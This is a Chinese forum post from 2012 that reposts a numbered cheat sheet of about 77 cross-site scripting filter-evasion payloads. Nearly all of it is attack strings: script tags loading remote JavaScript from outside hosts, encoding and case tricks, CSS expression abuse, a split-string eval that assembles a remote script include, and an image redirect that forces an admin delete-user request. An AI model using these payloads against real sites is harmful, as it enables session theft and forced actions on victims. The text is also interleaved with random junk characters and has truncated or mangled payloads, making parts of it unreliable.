貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。. F& k3 R3 q! |4 }& R5 L; F1 l
; D9 B1 h t- x. c" v6 W f
(1)普通的XSS JavaScript注入
3 t- @( V: n. s1 S5 [# M <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' l' ^! s/ z% Z0 K3 Z* S6 K
8 e) z1 F2 r+ @, j9 [2 m
(2)IMG标签XSS使用JavaScript命令6 G8 q" a; j: p# u+ ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 u9 ?) S$ S; J* H% p
! i! X0 N3 Y5 h: V6 q; V! d( Z9 q
(3)IMG标签无分号无引号
" i: p8 l+ [# Y4 {0 V1 c& D <IMG SRC=javascript:alert(‘XSS’)>7 F0 U1 p8 T" b8 k+ h% F
q; Z- B6 v- @& O W- {$ N2 d9 r (4)IMG标签大小写不敏感, m) j% Y) I) d- y; ]4 a
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ |8 J( o/ t% l3 q& ]9 A/ J9 q3 m7 s
6 { w% V0 }0 |1 U+ f2 J/ H7 S
(5)HTML编码(必须有分号)
8 ^6 h1 Z9 j5 z% O: s8 e <IMG SRC=javascript:alert(“XSS”)>+ O* E* n3 ]7 [0 X
( M O% g A0 F
(6)修正缺陷IMG标签
" T K! q9 Z% K+ o$ h* ] U <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 n: f w7 d- {7 ~; f8 e. I" Q5 y& Y
2 Y! I( f6 K8 e1 D8 ~
(7)formCharCode标签(计算器)% P- m' e4 F# c! }" w0 u
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
# x) r5 f! R- M; Z6 t n J+ `0 ]
Y' p/ i9 D' n% w5 l' J; x' \ (8)UTF-8的Unicode编码(计算器)6 ?+ d2 k: n O% t7 K. z- Q- C
<IMG SRC=jav..省略..S')>
2 f& ^" i* j, X: ]6 q
2 L' C' ]# x5 r (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
5 ~4 ^- q4 i/ D6 o5 z! j <IMG SRC=jav..省略..S')>5 J! [" @( h8 O% K
8 }$ k x J! p (10)十六进制编码也是没有分号(计算器)6 S; M! L/ Q$ b6 D2 F4 ~9 w" p
<IMG SRC=java..省略..XSS')>- l+ D( @2 @' S8 M
$ y. z L6 o$ p( P9 V& w8 E' k
(11)嵌入式标签,将Javascript分开
$ g' c$ ~6 R: [. m) S p9 b1 n <IMG SRC=”jav ascript:alert(‘XSS’);”>3 B J/ s* ~: h
: c9 w' c8 u; M8 z/ O (12)嵌入式编码标签,将Javascript分开
: K0 r! K4 q# w& D3 i4 j <IMG SRC=”jav ascript:alert(‘XSS’);”># r$ j. l! w4 G! c3 T- E
% [8 M; Q: I' d (13)嵌入式换行符
* F, B6 M* g: y Z: v <IMG SRC=”jav ascript:alert(‘XSS’);”>9 m$ c7 x8 i0 e0 C
) Q" @6 N O1 c, {$ j (14)嵌入式回车$ O! H7 w- Z* |. w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! z" _% U! c" _3 G" J5 L6 c
$ G) I& y6 o2 ? c" Y, ?% Q+ k (15)嵌入式多行注入JavaScript,这是XSS极端的例子# Q: ?# N; `) q
<IMG SRC=”javascript:alert(‘XSS‘)”>
; u3 S& V4 G+ N8 i2 ]
8 H9 o0 [: Q8 a4 @2 j( n (16)解决限制字符(要求同页面)
$ \* W# i, P7 r* R. ^ <script>z=’document.’</script>
2 B7 r# f4 C+ {- U8 H. n <script>z=z+’write(“‘</script>& w) w" h' F/ z$ l0 O
<script>z=z+’<script’</script> i6 h$ n( \+ \ m4 k
<script>z=z+’ src=ht’</script>' b5 W) |- G2 H$ c
<script>z=z+’tp://ww’</script>
) a' B; b+ V6 E$ i9 a) x! q <script>z=z+’w.shell’</script>
) Z- k" R+ u. t( s <script>z=z+’.net/1.’</script>
: s# W, M/ h; g4 w# j6 N1 ]8 g <script>z=z+’js></sc’</script>
0 Q/ g% u) D; R/ b <script>z=z+’ript>”)’</script>& t7 p9 g9 k' [: x0 x* f& a+ \
<script>eval_r(z)</script>7 b5 t; \- s L
8 U$ V: Q- \# e& d (17)空字符
4 f' }1 `. f! k' N- D1 e perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 M% Z! k' d/ ]3 v) b+ s
9 K- J2 h( a" u: b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' Z3 v6 X( P$ H" j+ d perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
. S* b& t, G4 M. n9 \$ ], K6 c
: v8 {% q. b6 m: \# d# T( b( i4 t- e (19)Spaces和meta前的IMG标签, K7 a \: o4 {1 R
<IMG SRC=” � javascript:alert(‘XSS’);”>
) b6 U2 I' L3 s" w8 h4 y( _( Q9 V; ~- z/ I8 b6 F/ l
(20)Non-alpha-non-digit XSS" @+ ]4 u, X, k2 B: X! R; I5 \9 V I
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! }( B% |+ m8 _0 I: u) u9 _3 A- h
, J% g. n. F8 m ~4 i2 W (21)Non-alpha-non-digit XSS to 2
1 N7 ?. s: K" |1 j <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% a" k# x% G! t
- x. \; t2 O7 l/ f9 i1 Q! r# n (22)Non-alpha-non-digit XSS to 3
5 Y8 O: Z% m2 t& |2 S3 B <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
Y. i! Y; O: S D% w8 a0 S* B5 G& G4 c+ ?% y
(23)双开括号/ `( x- b6 V: h9 O& J( L* i
<<SCRIPT>alert(“XSS”);//<</SCRIPT># M$ w, K% w" K) c8 y" F! n
) H9 V: V" K3 I1 j# j2 w; |0 Z+ b (24)无结束脚本标记(仅火狐等浏览器)
+ A3 N( N3 l7 `" @" j% Y, C <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( e9 S4 Q. M# h7 z' Q3 } y2 v6 l$ ?( X3 N8 U* u% C4 h
(25)无结束脚本标记2
; G* I# f) g% w+ G' @; E* _ <SCRIPT SRC=//3w.org/XSS/xss.js>
% c& ^% o) n- N) d, } S" v0 r/ X8 R; q5 V) m, w
(26)半开的HTML/JavaScript XSS
( B# Q( I2 ~& c, c7 A" X x( n5 V <IMG SRC=”javascript:alert(‘XSS’)”
1 Y3 E3 [/ B3 N; ?! V* ~7 o' S& O' f Q" I' |/ s
(27)双开角括号
1 }& S9 v" B. ^0 B <iframe src=http://3w.org/XSS.html <+ W+ F9 [; K0 F$ g U
+ Z6 A4 v: y8 v- I6 R6 R (28)无单引号 双引号 分号
% {: T5 D( m' s% a; T, S, X <SCRIPT>a=/XSS/
1 Y# Z4 P6 v6 p7 J. J alert(a.source)</SCRIPT>
i/ G3 X& ]; g- \+ J( b% l* N, r+ e
(29)换码过滤的JavaScript' u% Z9 ~6 f. M" J
\”;alert(‘XSS’);//
7 X% _; n# P2 N9 I
1 O5 j0 B3 i1 ^7 M! n! K0 I, K1 D) s (30)结束Title标签
$ A! x3 m8 Z' R/ r9 P0 v ~ </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' h* s- f. E( J
% G( p: w9 o6 K; Q L; ]2 n3 v+ x (31)Input Image
' N4 g/ D3 \" a! P. @6 h <INPUT SRC=”javascript:alert(‘XSS’);”>2 t$ x! l5 K9 K
. D: m) v: Y. {7 G( u/ X v
(32)BODY Image
' I Z& W( E! i: C, o+ Z <BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 O" l$ d. i+ \; c3 e9 z# C: d
1 {) o) C$ l! m0 ^1 h+ A; a
(33)BODY标签
; t% I& y e, W1 \2 e" j <BODY(‘XSS’)>
3 e) C. w: V+ H' |. s4 l& @8 l( w$ K* F
(34)IMG Dynsrc
1 S$ ~% }) l" U3 A6 z) F* r <IMG DYNSRC=”javascript:alert(‘XSS’)”>& B4 }8 F7 x: Z* J8 h% \
' N. r: {$ ]: a5 f" t/ t, K
(35)IMG Lowsrc8 Q8 p7 b" S3 g. ]' B) t! q( K
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. j6 A) @% @* M. m
/ \/ B2 r! }( z& ^) A, D
(36)BGSOUND7 l* W. M# l& R2 D5 x. ^
<BGSOUND SRC=”javascript:alert(‘XSS’);”>9 p% i/ q+ `% U$ c
~ E6 e" Y2 T% V& F- n0 J- o- T
(37)STYLE sheet
/ g+ R& w% |3 P9 t" m( h d <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ y. M; O& T. r3 R U# G9 E3 R1 ]( ]4 ?, s! J
(38)远程样式表
# X7 A# I+ b- P% { <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
" j' Y2 U" v# p z; {: ]. W
( V* b/ N8 W2 r/ a, Y( | (39)List-style-image(列表式)
4 P3 H1 Z6 v# ?) t5 z- s4 L W! A <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) G/ A5 u# I9 E3 }
* F9 z3 s: x5 R' J7 L3 d
(40)IMG VBscript$ z3 p# p# N2 T" D6 U: v
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 f0 {& P; y- z3 n5 f9 \
& @& q4 s; S% a- X& x (41)META链接url
& L; i i+ x4 r# k; W <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
2 [* Y2 |" P+ h% U: W8 }$ A) Z2 a S: I! Y- h5 j; L
(42)Iframe# ~. a2 \1 |& b* ~3 ^" j
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>4 g& c% L, J1 I C7 D3 @
( }+ u4 x# H) H (43)Frame
K* t0 E- e2 _( a <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> Y# w: B, W% a# \
$ U/ t" ?! r5 W4 Q
(44)Table" O x& w1 h/ }* J M) T& g2 C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. Y: J& Q' b2 d7 {/ @4 H
/ V' \* H& e0 h (45)TD. o& b$ h7 @' n$ i
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 e$ A& W1 j. u
1 k+ I `5 m* J5 o (46)DIV background-image2 p* o) a( h; P8 [3 e
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 S7 C: f+ T5 T& ^& b4 A+ L- c) B) k
0 i5 ]4 _8 Q) J# {) ~* }3 N (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) J8 j% U' S8 q1 W& ]* c6 f <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>9 D; K n5 Z1 a1 Y; D' P, r
/ J# O' e1 ^8 Z5 L4 h (48)DIV expression
( r2 y+ {! ]8 ?, V <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ t* y5 }8 \/ B B0 V, ]3 G9 t1 j; G% P& e
(49)STYLE属性分拆表达3 G/ j) _. E$ X
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 T$ Q. @& l' k p5 i( y" X
3 `6 `* j$ J6 A. b y( [ (50)匿名STYLE(组成:开角号和一个字母开头)1 f% B$ S' E) h1 y, T
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* P' v# D8 \5 b+ x# F7 ]: e
8 E; ]8 Q" R% p
(51)STYLE background-image
) x3 O8 ^9 P2 a- ~$ s5 n <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
; D3 y. ^9 h& [& @# {; f2 X; y' F% K' z! W/ k9 Y- Y- `' F" {
(52)IMG STYLE方式5 p3 i4 x! J! K. w( E
exppression(alert(“XSS”))’>
' w/ ^( o/ p/ Q0 F
* Q$ o9 Y9 |2 @) ]2 t. { (53)STYLE background; y7 v$ Y; G6 H C2 s, ]
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& E2 A; P9 _0 {5 e( @: J- X: N7 l4 K+ f, r5 E9 k2 i' E
(54)BASE8 H6 x; A O- w: A( x' u# ?, v J
<BASE HREF=”javascript:alert(‘XSS’);//”>9 E, d2 B' t3 j: ]4 X# G# j
* {) [6 H% @, g4 E! C0 [. r) D
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" K/ R$ A4 g t# G. q! |
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 |- p9 N# U: N: J! M. Q- p
* n4 u; D# ~0 G7 B! t) n% B (56)在flash中使用ActionScrpt可以混进你XSS的代码
: u Z6 U% J' Z; T* V' k a=”get”;; e; }3 L. w1 E( s# v H
b=”URL(\”";8 S9 N+ ~" x" g8 b2 [* l; i5 ~. p+ g
c=”javascript:”;: P. n" g6 H+ `3 k8 N
d=”alert(‘XSS’);\”)”;
, ?3 v: [" O3 V6 p- e; Y; S eval_r(a+b+c+d);1 C. m! `. l1 ?3 ^8 V9 c% ?) k
% D5 [ r7 b( y8 `& A9 Y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; D# O/ z2 f2 k9 y! {) m. g. c! y <HTML xmlns:xss>
/ o9 e- W4 A, R: `* a6 U <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>1 H Q r( A- y/ j& p* a
<xss:xss>XSS</xss:xss>
# n, g* n: ]4 R </HTML>
2 O6 h* s8 L' d$ P9 h
5 ?: N8 p" ]1 j4 Q (58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ G1 Y7 {( A4 g! a# g- l
<SCRIPT SRC=””></SCRIPT> i' p0 l0 b3 ^! z- B
6 K0 R3 M. w0 L v. g
(59)IMG嵌入式命令,可执行任意命令8 P$ l# Y- P/ B
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# O* `9 S$ x' z8 Y3 ~% e) j$ q
/ j( o( _8 F5 } (60)IMG嵌入式命令(a.jpg在同服务器): `$ g0 {4 R3 W5 @4 ^* d
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. q6 Z7 H5 \9 Z0 ~4 O
+ e/ u& t: ~" X
(61)绕符号过滤5 K) _$ u; P: P& R8 i
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 v3 E) y3 N7 x- I6 d3 E
+ t$ F' Y, X# l2 q. ~: e. v" \! i (62)
! n9 E( {" [; h <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 r) ~) Y6 j. x) l
( |. d3 S; Y6 ~% x
(63)0 b& N- @+ C3 }( Q0 J* c8 G M* m
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 q" F/ ^7 Y W0 T) N
* c4 o' ?% Y$ D" Y, W: g (64)
7 v2 X( ^! N& x6 |) H <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
" `6 b' f0 u, g2 R& ]+ i6 h1 ]1 E& g3 Z) V7 T
(65)$ u4 Y' `/ V* P! M- `; n, a$ i
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># H, V+ C) a3 P: y% r# K
. E# i9 Q3 @* _3 N- O8 P, a (66)
' R1 L* B: C" W4 \# ], W$ f- S% j" [& ? <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
" p1 a6 h, S8 B7 L- z
5 G& z$ u2 F- u1 | (67)
$ J5 B6 K$ u+ B0 n+ @" e& F3 ] <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
0 i+ {, P% P6 p4 a% o8 E+ s
3 G* |0 n3 ^8 F8 E/ |2 i$ n. M (68)URL绕行
# T* K' A8 |: w! p1 G <A HREF=”http://127.0.0.1/”>XSS</A>
1 X0 [4 W" p9 ]. P r3 O
4 T2 O% K+ x* V! [2 X (69)URL编码
% w. O( c0 Y. X( C <A HREF=”http://3w.org”>XSS</A>
* {3 C2 }& `. N" w# H& }& J
1 u$ d. z6 d% g% u; L (70)IP十进制
0 y7 i& C% p* \0 s7 r <A HREF=”http://3232235521″>XSS</A>) F, f% D7 H2 F! V) t
8 J$ _5 Q6 t/ |& b
(71)IP十六进制
' A+ K1 ~6 v! z9 x" b) Q <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>5 |- ~/ L! z# _$ \* e
8 S7 i6 o1 H, ]; l! \ (72)IP八进制
6 L M- a2 ^" V) x$ I3 b% S9 N <A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 K3 q& P7 w+ A( `" T6 U r1 m, W2 J7 l
(73)混合编码
3 Q$ x- @" R& m <A HREF=”h
" v4 l2 ]) Z0 ] l; ^) C% @ tt p://6 6.000146.0×7.147/”">XSS</A>
; j ?" u1 I; g! X2 v" E. N; E) |7 G$ a4 m1 _ B5 y8 W
(74)节省[http:]
0 r4 J V6 } Z# i4 n! X3 ` <A HREF=”//www.google.com/”>XSS</A>1 y; x# r$ `1 ^
8 c0 p+ `( C7 ?( \5 t2 P4 g (75)节省[www]
5 j- W# _7 G: M+ T1 |4 n <A HREF=”http://google.com/”>XSS</A> P) R5 ?* ^# B/ u& w) X% ~; w
2 r, ?( a& _( ~- S9 O2 Z4 a0 ]* f (76)绝对点绝对DNS: \; u( o' t$ G' w
<A HREF=”http://www.google.com./”>XSS</A>
% K' y! U( O2 d4 c
1 m/ v# d3 ]4 K2 N (77)javascript链接5 Y4 }" D" Q3 @$ W8 W z$ B6 N
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对